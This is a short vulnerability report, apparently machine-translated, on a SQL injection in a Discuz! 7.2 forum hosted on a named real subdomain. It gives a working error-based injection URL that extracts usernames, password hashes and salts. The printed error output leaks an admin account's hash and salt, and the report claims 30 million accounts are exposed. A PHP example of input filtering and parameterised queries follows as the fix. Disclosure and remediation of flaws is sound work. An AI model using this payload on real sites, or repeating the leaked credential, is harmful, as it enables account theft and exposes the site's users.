SQL injection vulnerability in a subsite of Superstar Network
Vulnerable address: club.chaoxing.com/bbs, which is affected by the earlier dz7.2 (Discuz! 7.2) injection.
Http://club.chaoxing.com/bbs/faq.php? Action = grouppermission & gids [99] = % 27 & gids [100] [0] = % 29% 20and % 20% 28 select % 202% 20 from % 20% 28 select % 20 count % 28 * % 29, concat % 28% 28 select % 20 concat % 28 username, 0x3a, password, 0x3a, salt % 29% 20 from % 20uc_members % 20 limit %, 1% 29, floor % 28 rand % 280% 29*2% 29% 29x % 20 from % 20information_schema.tables % 20 group % 20by % 20x % 29a % 29% 23
Discuz! Info: MySQL Query Error
Time: am
Script: /bbs/faq.php
SQL: SELECT * FROM [Table] usergroups u LEFT JOIN [Table] admingroups a ON u. groupid =. admingid WHERE u. groupid IN ('7', '\', ') and (select 2 from (select count (*), concat (select concat (username, 0x3a, password, 0x3a, salt) from uc_members limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x) )#')
Error: Duplicate entry 'admin:b1649ebd2df3aa808b7fdd7b1dd6a93d:3225521' for key 'group_key'
Errno.: 1062
Similar error report has been dispatched to administrator before.
Find a solution for this error in the http://faq.comsenz.com
The admin password is disclosed in the error message, and a great deal of other sensitive information can be exposed. By traversing the records, the account passwords of 30 million users can be obtained.
Solution:
Filter
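
One way to implement the filtering named above, as an added example that is not Discuz! code or the reporter's: the gids request parameter is reduced to a list of positive integers, and the IN (...) list is built from placeholders only. The function names, the unprefixed table name and the sample request are assumptions constructed for illustration.

```php
<?php
// Added example (not Discuz! code). Function names are hypothetical.

/**
 * Reduce a request-supplied gids value to a list of positive integer IDs.
 * Values that are not plain decimal strings (nested arrays, quotes,
 * backslashes, SQL fragments) are dropped rather than escaped.
 */
function filter_group_ids($raw, int $max = 50): array
{
    if (!is_array($raw)) {
        return [];
    }
    $ids = [];
    foreach ($raw as $value) {
        // gids[100][0]=... arrives as a nested array: reject it, never index into it.
        if (!is_string($value) && !is_int($value)) {
            continue;
        }
        // \z (not $) so a trailing newline cannot slip through; 9 digits fits a 32-bit int.
        if (!preg_match('/^[1-9][0-9]{0,8}\z/', (string) $value)) {
            continue;
        }
        $ids[(int) $value] = (int) $value;   // keyed by ID to de-duplicate
        if (count($ids) >= $max) {
            break;                            // bound the size of the IN list
        }
    }
    return array_values($ids);
}

/** One "?" placeholder per validated ID; no request data enters the SQL text. */
function group_in_placeholders(array $ids): string
{
    return implode(',', array_fill(0, count($ids), '?'));
}

// Constructed sample mirroring the shape of the request on this page:
// one legitimate ID, one lone quote, one nested array carrying SQL text.
$request = ['gids' => [1 => '7', 99 => "'", 100 => [') and (...)#']]];

$ids = filter_group_ids($request['gids'] ?? null);
var_dump($ids);

if ($ids !== []) {
    // Placeholder table name; bind $ids with PDO or mysqli prepared statements.
    $sql = 'SELECT * FROM usergroups WHERE groupid IN (' . group_in_placeholders($ids) . ')';
    echo $sql, PHP_EOL;
}
```

Rejecting the nested array outright matters here: the query in the error report shows a single backslash ending up inside the quoted IN list, which is what lets the following element escape its quotes.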